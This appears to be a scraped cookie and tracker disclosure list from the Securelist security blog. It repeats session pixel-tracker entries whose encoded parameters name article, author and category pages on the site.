activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=2606226875248;npa=0;auiddc=389467388.1727440675;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fblindeagle-apt%2F113414%2F;u6=;u7=00978870110135185192099369109995058940-GA1.1.752136365.17274Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=2635018061941;npa=0;auiddc=604288503.1727437556;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fdate%2F2011%2F;u6=;u7=62924978076360334884219286179285685248-GA1.1.938325620.1727437555;u8=%5BPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=2814231854246;npa=0;auiddc=2061824987.1727437526;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthors%2F;u6=;u7=58407965177857911121260763717953289303-GA1.1.1732942554.1727437525;u8=%5BtrPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=2918966778371;npa=0;auiddc=1476163774.1727440623;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2F;u6=;u7=10541332889268975903074509148866296383-GA1.1.816642484.1727440622;u8=%5BtrafficType%5Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=2992397752934;npa=0;auiddc=744385398.1727440721;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fadvanced-threat-predictions-for-2020%2F95055%2F;u6=;u7=57308088220857719892872451136844596694-Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=310062346290;npa=0;auiddc=1908927449.1727437460;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fksb-2023%2F;u6=;u7=39673012740457053282889438079958865763-GA1.1.765245434.1727437459;u8=%5BtraPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=3117928512408;npa=0;auiddc=1179866718.1727437481;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fabdulrhmanalfaifi%2F;u6=;u7=52483067802482707832004150018571855908-GA1.1.2046048419.Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=3123599293280;npa=0;auiddc=1644311259.1727440756;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fksb-privacy-predictions-2024%2F111815%2F;u6=;u7=02702959816498802282673104043276955343-GA1.1.Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=3164510730913;npa=0;auiddc=2131921946.1727440647;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fksb-2022%2F;u6=;u7=67843815017677391723480488741392122002-GA1.1.2104575430.1727440645;u8=%5BtPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=3244346502580;npa=0;auiddc=1329421900.1727440627;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fall%2F;u6=;u7=71362974711306570281418887410524962665-GA1.1.1599391926.1727440625;u8=%5BtraffiPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=3266602463775;npa=0;auiddc=837366201.1727437492;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Falexanderalkolesnikov%2F;u6=;u7=39193494716425750184471313905983120456-GA1.1.17868390Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=3377152864554;npa=0;auiddc=753070097.1727437516;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fandersonleite%2F;u6=;u7=23359555793319941201269959301040424155-GA1.1.601170996.172743Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=3542591093849;npa=0;auiddc=2033121313.1727437536;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fantonkivva%2F;u6=;u7=09125449393396065504042596085119492798-GA1.1.615022443.17274375Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=3868286471903;npa=0;auiddc=845309514.1727437537;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fadvanced-threat-predictions-for-2020%2F89698%2F;u6=;u7=49942623665892187750170376122000766253-Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=395680205802;npa=0;auiddc=1346684026.1727440745;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fksb-ics-predictions-2024%2F111835%2F;u6=;u7=23663623641645669840298339752992216200-GA1.1.42993Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=4060209138774;npa=0;auiddc=1086999071.1727440678;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fannalarkina%2F;u6=;u7=81048283928484174784237802964637244817-GA1.1.2126359758.172744Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=4244693430323;npa=0;auiddc=2099855745.1727440712;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fcategory%2Fspam-and-phishing-reports%2F;u6=;u7=11272576162662263122425134866156024287-GA1.1.1Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=4272805319225;npa=0;auiddc=557474534.1727440626;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fthe-darkhotel-apt%2F66779%2F;u6=;u7=19636556529996847873953486586871029364-GA1.1.840532267.172Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=4310468063380;npa=0;auiddc=547255573.1727440699;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fdmitryanikin%2F;u6=;u7=76745182695536675011347986548642801902-GA1.1.285991735.1727440Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=442622344903;npa=0;auiddc=1186487123.1727440694;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fsergeyl%2F;u6=;u7=38949142678709789893424050381650289819-GA1.1.1028759521.1727440693;Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=4586666973462;npa=0;auiddc=1170270135.1727440626;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fksb-2023%2F;u6=;u7=50465321486460470864398904777126294909-GA1.1.1560572291.1727440625;u8=%5BtPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=4593933549094;npa=0;auiddc=1283529308.1727440701;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fcategory%2Fincidents%2F;u6=;u7=48339842005773113801610195536751735354-GA1.1.1797414478.172744Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=4665615876343;npa=0;auiddc=280620743.1727440655;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fksb-2021%2F;u6=;u7=68678898491888057411124483382338380099-GA1.1.1185459970.1727440653;u8=%5BtrPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=4699672632547;npa=0;auiddc=1335170008.1727437566;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fla-amenaza-de-darkhotel%2F66290%2F;u6=;u7=79334375051999895880615305528012285856-GA1.1.156662Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=4711577605446;npa=0;auiddc=1350238876.1727437472;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategories%2F;u6=;u7=06984270054023435992426289849200072631-GA1.1.425240927.1727437472;u8=%5BPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=4798470169073;npa=0;auiddc=752012922.1727440800;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fthreat-category%2Ffinancial-threats%2F;u6=;u7=22993815152058628654532264499147777029-GA1.1.163Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=4864311693212;npa=0;auiddc=1738843191.1727440689;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fannapavlovskaya%2F;u6=;u7=05420483207424820304411943096496296572-GA1.1.577376272.172Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=4865790737491;npa=0;auiddc=1847856492.1727440729;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fcategory%2Fmalware-reports%2F;u6=;u7=75235355780749006233783318498275665224-GA1.1.853500399.1Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=4944021580939;npa=0;auiddc=1710520577.1727440685;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fquick-look-at-cve-2021-1675-cve-2021-34527-aka-printnightmare%2F103123%2F;u6=;u7=113149621276Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=4962390060154;npa=0;auiddc=1165093661.1727440680;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fromandedenok%2F;u6=;u7=81223536574419383143258270732345879883-GA1.1.1524437782.17274Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=5001176275058;npa=0;auiddc=175674525.1727440662;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fgreat%2F;u6=;u7=11774573048072702472316611863486077251-GA1.1.539058141.1727440661;u8=Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=519996980184;npa=0;auiddc=38711611.1727437576;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategory%2Finvestigacion%2F;u6=;u7=17132450686422161503247848367016694934-GA1.1.1415177151.17274Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=5334616530757;npa=0;auiddc=1008145956.1727440775;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fkaspersky-security-bulletin-consumer-threats-2024%2F111135%2F;u6=;u7=019209209143164122808380Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=5353492679577;npa=0;auiddc=300758614.1727440674;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fnadezhdalavrova%2F;u6=;u7=48819660587829104030018049294794621632-GA1.1.1713838232.172Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=5384193588740;npa=0;auiddc=1898206813.1727437529;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fflavionegrini%2F;u6=;u7=12626006958089755621434918844532291541-GA1.1.709230129.17274Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=5647325074452;npa=0;auiddc=496140466.1727440703;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fvictorsergeev%2F;u6=;u7=35452719957975963052477693117398400241-GA1.1.492702740.172744Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=566193828091;npa=0;auiddc=2059511901.1727440725;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fkaspersky-security-bulletin-crimeware-financial-threats-2024%2F111093%2F;u6=;u7=35834537307404Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=5722767084496;npa=0;auiddc=440451389.1727437538;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategory%2Finformes-sobre-malware%2F;u6=;u7=39823551448718302660090966607798555990-GA1.1.55517Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=5844346491345;npa=0;auiddc=2104024809.1727440695;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fdarknet-it-headhunting%2F108526%2F;u6=;u7=25636085535779666633074220810968575017-GA1.1.163517Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=588985513263;npa=0;auiddc=321132500.1727437579;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fanlisis-del-wifi-en-dubai%2F65862%2F;u6=;u7=28011002834404586314075510250248182511-GA1.1.702469Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=5938845990332;npa=0;auiddc=1186947829.1727440744;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Feastwind-apt-campaign%2F113345%2F;u6=;u7=46045099443700312591366670871790638841-GA1.1.2075893Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=5960110624279;npa=0;auiddc=1256895094.1727437533;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fblindeagle-apt%2F98948%2F;u6=;u7=48651223581870592581134712962843083305-GA1.1.1264661947.1727Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=6086428147962;npa=0;auiddc=319471811.1727437503;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fvitalymorgunov%2F;u6=;u7=29174290508384098800592988753044080319-GA1.1.768492780.17274Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=6087216121228;npa=0;auiddc=1621560759.1727440733;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fdarknet-predictions-for-2024%2F111763%2F;u6=;u7=11676063070224339724059036742351205235-GA1.1.Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=6110484826305;npa=0;auiddc=810020270.1727437494;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategory%2Fdescripciones-de-malware%2F;u6=;u7=11960918455848082151229466542324428479-GA1.1.160Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=6117199613047;npa=0;auiddc=2101260197.1727437486;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fsecurelist%2F;u6=;u7=41231694832427257503769302415529653725-GA1.1.765569094.17274374Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=6173655776241;npa=0;auiddc=60421235.1727437555;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fdate%2F2003%2F;u6=;u7=13770572924420675720841919302273919996-GA1.1.1129853937.1727437554;u8=%5BPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=638646294920;npa=0;auiddc=564605501.1727437443;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2F;u6=;u7=63788157766642488144129846164323947842-GA1.1.85701915.1727437442;u8=%5BtrafficType%5D;uPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=6528277335301;npa=0;auiddc=206282691.1727440743;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fcategory%2Fpublications%2F;u6=;u7=22804129350723111510688486681616447280-GA1.1.1699331096.1727Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=6548277857614;npa=0;auiddc=1467608740.1727437486;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategory%2Fboletin-de-seguridad-de-kaspersky%2F;u6=;u7=66323107636942524770039623386752753342Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=6646062504864;npa=0;auiddc=2132523247.1727437503;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fdmitrykalinin%2F;u6=;u7=76736002065230012523549081297515953961-GA1.1.908016203.17274Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=6765711791709;npa=0;auiddc=347889008.1727440762;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fkaspersky-security-bulletin-apt-predictions-2024%2F111048%2F;u6=;u7=09815024404137843880082804Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=6916817467921;npa=0;auiddc=549524205.1727440719;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fcategory%2Fmalware-descriptions%2F;u6=;u7=57744180434213222200217442392308098969-GA1.1.5681212Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=6952578559344;npa=0;auiddc=166435217.1727440709;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fvladislavtushkanov%2F;u6=;u7=66803834508039865431166465604213763151-GA1.1.497696977.1Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=7004557932780;npa=0;auiddc=1459378398.1727440745;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fthe-story-of-the-year-ransomware-in-the-headlines%2F105138%2F;u6=;u7=848211413572621955441531Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=7046329871158;npa=0;auiddc=1051665432.1727440640;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fatm-infector%2F74772%2F;u6=;u7=48554836981417199894223055251471799690-GA1.1.1884819381.172744Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=7112534122638;npa=0;auiddc=490918692.1727437526;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fannalarkina%2F;u6=;u7=10841208243244163531036754683244071973-GA1.1.2119376506.1727437Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=715697304728;npa=0;auiddc=1610125993.1727440668;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fkaspersky%2F;u6=;u7=66416911999800364750345625177613043896-GA1.1.672434421.1727440667Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=7247859176268;npa=0;auiddc=985742677.1727437510;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Feduardoovalle%2F;u6=;u7=60496222377468188431679268076014233918-GA1.1.562309596.172743Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=7709709352383;npa=0;auiddc=1538821936.1727440670;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fandreyochepovsky%2F;u6=;u7=65144947279447921350504370662523061707-GA1.1.340106512.17Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=8002709747688;npa=0;auiddc=777338667.1727440702;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fcategory%2Fsecurity-technologies%2F;u6=;u7=22787936867265359120679702253499635281-GA1.1.316278Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=8094254646498;npa=0;auiddc=38798888.1727437527;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategory%2Finformes-sobre-crimeware%2F;u6=;u7=46158173434714447620849146037975589789-GA1.1.6559Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=8101130661581;npa=0;auiddc=37481962.1727440692;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fcategory%2Fresearch%2F;u6=;u7=40136015754564670012202018056944576747-GA1.1.1469120555.172744069Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=812279068586;npa=0;auiddc=576434696.1727440686;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fsecurityservices%2F;u6=;u7=90229982460643203972906790906345963116-GA1.1.237790806.1727Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=8152838484567;npa=0;auiddc=887265654.1727437566;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategory%2Finformes-sobre-vulnerabilidades%2F;u6=;u7=50733969180907880841734708815088332393-GAPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=8195667997653;npa=0;auiddc=727648602.1727437548;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fkaspersky%2F;u6=;u7=14550306339944484791157041296611944879-GA1.1.1129359660.172743754Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=8316346019046;npa=0;auiddc=1242022810.1727437473;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fromandedenok%2F;u6=;u7=16102415806028775504565295034159540231-GA1.1.1048259230.17274Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=833383977836;npa=0;auiddc=1639105990.1727437620;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fdate%2F2002%2F;u6=;u7=12971329339327693400817167735926123770-GA1.1.378654724.1727437619;u8=%5BPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=8479668252374;npa=0;auiddc=630196765.1727440659;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Famr%2F;u6=;u7=45552076249260944840908125386396890325-GA1.1.249978631.1727440657;u8=%5Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=8751412253428;npa=0;auiddc=279600959.1727437603;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategory%2Fspam-y-phishing%2F;u6=;u7=39050926902133993463635097236512670916-GA1.1.2111631523.1Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=8892962663941;npa=0;auiddc=2032443595.1727437596;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategory%2Fpublicaciones%2F;u6=;u7=00936818682949067593432892184763063764-GA1.1.664092024.172Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=8954898724788;npa=0;auiddc=1535337916.1727437513;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategory%2Fincidents%2F;u6=;u7=77187078455778277632376488003237749208-GA1.1.1226772492.172743Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=9089461771934;npa=0;auiddc=1909025708.1727437509;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Fvladislavtushkanov%2F;u6=;u7=39535850962097857962722039732326378262-GA1.1.205782406.Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=9237295218813;npa=0;auiddc=661322217.1727437504;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Famr%2F;u6=;u7=15420140485528719610554763082648898758-GA1.1.1579438579.1727437503;u8=%Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=9413594954332;npa=0;auiddc=1177390830.1727440793;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fthreat-category%2Fapt-targeted-attacks%2F;u6=;u7=20432769977731602834497613588329717991-GA1.1Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=9510313596898;npa=0;auiddc=1018899725.1727437479;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategory%2Fapt-reports%2F;u6=;u7=29322008794073619491629566556817362426-GA1.1.549278979.17274Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=9858777613794;npa=0;auiddc=1186407119.1727437584;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategory%2Fopiniones%2F;u6=;u7=71602814411027826171286439032390896931-GA1.1.1369861098.172743Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=9897923688491;npa=0;auiddc=227079340.1727440650;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fconnected-medicine-and-its-diagnosis%2F81857%2F;u6=;u7=32034143259183607423229145098633123843-Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=glob2c;ord=9991916904857;npa=0;auiddc=1477139974.1727440729;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fevgenygoncharov%2F;u6=;u7=38886659683069407200863635887611935562-GA1.1.1831069076.17Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=globa0;ord=1167461388406;npa=0;auiddc=1165093661.1727440680;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fromandedenok%2F;u6=;u7=81223536574419383143258270732345879883-GA1.1.1524437782.17274Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=globa0;ord=1326309712750;npa=0;auiddc=557474534.1727440626;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fthe-darkhotel-apt%2F66779%2F;u6=;u7=19636556529996847873953486586871029364-GA1.1.840532267.172Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=globa0;ord=1599698862970;npa=0;auiddc=985742677.1727437510;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fauthor%2Feduardoovalle%2F;u6=;u7=60496222377468188431679268076014233918-GA1.1.562309596.172743Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=globa0;ord=1605112772409;npa=0;auiddc=1283529308.1727440701;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fcategory%2Fincidents%2F;u6=;u7=48339842005773113801610195536751735354-GA1.1.1797414478.172744Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=globa0;ord=1726256806463;npa=0;auiddc=1444344228.1727440736;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fksb-2023-statistics%2F111156%2F;u6=;u7=17763994304988376323015638750074360749-GA1.1.476872498Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=globa0;ord=1728360799948;npa=0;auiddc=480675657.1727440784;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Ftags%2F;u6=;u7=85633178148594568203293972727731941009-GA1.1.328314801.1727440781;u9=_tags_;ps=Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=globa0;ord=1780600949196;npa=0;auiddc=1350238876.1727437472;u1=B2C;u2=es_MX;u4=securelist.lat;u5=%2Fcategories%2F;u6=;u7=06984270054023435992426289849200072631-GA1.1.425240927.1727437472;u9=_caPending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=globa0;ord=1812826121482;npa=0;auiddc=389467388.1727440675;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fblindeagle-apt%2F113414%2F;u6=;u7=00978870110135185192099369109995058940-GA1.1.752136365.17274Pending
Maximum Storage Duration: SessionType: Pixel Tracker
activity;register_conversion=1;src=12346775;type=globalc;cat=globa0;ord=1820587590499;npa=0;auiddc=300758614.1727440674;u1=B2C;u2=en_IE;u4=securelist.com;u5=%2Fauthor%2Fnadezhdalavrova%2F;u6=;u7=48819660587829104030018049294794621632-GA1.1.1713838232.172Pending
Maximum Storage Duration: SessionType: Pixel Tracker
